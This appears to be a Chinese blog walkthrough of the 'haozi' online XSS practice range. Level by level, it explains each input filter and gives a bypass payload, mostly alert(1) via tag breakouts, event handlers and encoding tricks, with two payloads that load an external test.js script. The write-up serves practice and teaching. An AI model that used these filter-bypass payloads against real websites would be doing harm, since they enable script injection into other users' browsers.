当前位置:网站首页>XSS线上靶场---haozi
XSS线上靶场---haozi
2022-08-03 20:58:00 【抱小猫】
目录
线上靶场
https://xss.haozi.me/0x00
这一关没有什么限制,直接<script>alert(1)<script>就过去了
0x01
这一关是将我们输入的数据放入到<textarea>标签里面了,但是<textarea>标签里面无法执行JS代码,另外这关没有对符号等有其他限制,所以我们先闭合<textarea>标签,在写入JS代码
</textarea><script>alert(1)</script>
PS:HTML标签有自动纠错功能,所以无论后面加不加上<textarea>对后面的标签进行闭合都可以执行这个代码
0x02
这一关是将我们输入的数据传输到value中,所以我们需要先闭合双引号,再执行JS代码
aa" οnclick="alert(1)
0x03
这一关对(、)、[ 、] 进行了限制,这时我们就可以考虑使用反引号代替括号执行JS代码,在执行的JS代码前面需要对value进行双引号闭合
aa" <script>alert`1`</script>
0x04
这一关对(、)、[ 、] 、` 进行了限制,我们无法使用反引号后使用将括号进行编码尝试进行绕过
aa" <img src=1 οnerrοr=alert(1)
0x05
这一关会将输入的内容放入注释符中,且对输入的注释符有过滤,使用js中的第二种注释符:--!>
aa" --!> <img src=1 οnerrοr=alert(1) 不用编码也可以绕过
0x06
过滤了js中的点击事件,将函数换行后再执行
aa" type="image" src=1 onerror 需要换行
=alert(1)
0x07
过滤了JS中的script等标签,尖括号等特殊符号也过滤了,html语言比较松散-->会对不对的语法进行补全,不加结束标签试试,不行,不能一对尖括号,所以我们使用<img标签
<img src=1 οnerrοr=alert(1) 需要再结尾进行换行
0x08
输入的内容放入了<stype>标签中,<stype>标签中的内容不执行JS,利用换行实现闭合<stype>,换行也绕过了正则表达式
</style 一定要在标签没有闭合的状态下换行
><img src=1 οnerrοr=alert(1)
0x09
正则表达式限制了必须以http开头,可以闭合前面的标签,在中间实现绕过,并使用//注释后面的内容。
http://www.segmentfault.com"></script><script>alert(1)//
0x0A
URL格式:@可以将前面的网站重定向到后面的网站。所以我们可以先创建一个JS脚本,然后将网站重定向到我们自己写的JS脚本
http://[email protected]/test.js
0x0B
toUpperCase() 方法用于把字符串转换为大写。 此题将我们输入的内容转化成大写,
利用 <img src=1 οnerrοr=实体编码> 或 <svg/οnlοad=实体编码> 实现绕过
<img src=1 οnerrοr=alert(1)>
<svg/οnlοad=alert(1)>
0x0C
对输入的数据进行大小写,且过滤script,可以使用<svg/οnlοad=实体编码绕过> 或<details open οntοggle=实体编码>绕过
<svg/οnlοad=alert(1)>
<details open οntοggle=alert(1)>
0x0D
此关卡过滤了/[</"']符号,并且将输入的内容放入注释符内,我们需要先换行逃脱注释,写完弹窗函数后还需要换行将后面的符号注释掉。
#换了一行
alert(1)
--> #注释掉后面的单引号和括号
0x0E
此关卡对尖括号开头的字母进行了限制并且大写了字母,这时我们可以使用一个特殊符号 ſ --> 字符大写是会转成S,实现绕过
<ſvg/οnlοad=alert(1)>
<ſcript src="http://127.0.0.1/test.js"></ſcript> #我们通过引入自己的JS文件实现绕过
0x0F
这一关对很多符号进行了转义,但是可以直接识别,所以这样的编码限制没有太大作用,我们只需要将前面的闭合后弹窗将后面的字符注释掉就可以了。
bbb');alert(1)//
0x10
window.data就是一个全局变量,直接写alert相当于将alert传输到window.data
0x11
与F关 很类似,直接将前面的闭合,注释后面的就可以了
aa");alert(1)//
0x12
该关卡与11关相似,但是将双引号替换成了\\ ,我们需要加上\ 进行转义
aa\");alert(1)//
边栏推荐
猜你喜欢
随机推荐
8.2模拟赛总结
15 years experience in software architect summary: in the field of ML, tread beginners, five hole
敏捷交付的工程效能治理
glusterfs build and use
CLIP论文解读
ES6 introduction and let, var, const
leetcode 剑指 Offer 15. 二进制中1的个数
Leetcode 899. An orderly queue
LeetCode_Digit Statistics_Medium_400. Nth Digit
收藏-即时通讯(IM)开源项目OpenIM-功能手册
xss.haozi练习通关详解
从开发到软件测试:除了扎实的测试基础,还有哪些必须掌握 ?
直播平台怎么搭建,针对输入框的各种组件
2022年强网杯rcefile wp
博士申请 | 美国明尼苏达大学葛畅教授招收隐私数据管理方向全奖博士/硕士/博后/访问学者...
详解虚拟机!京东大佬出品 HotSpot VM 源码剖析笔记(附完整源码)
力扣59-螺旋矩阵 II——边界判断
深度学习怎么入门?零基础快速入门深度学习
idea2021配置svn报错Cannot run program “svn“ (in directory “xxx“):CreateProcess error=2,系统找不到指定的文件
chart.js多条曲线图插件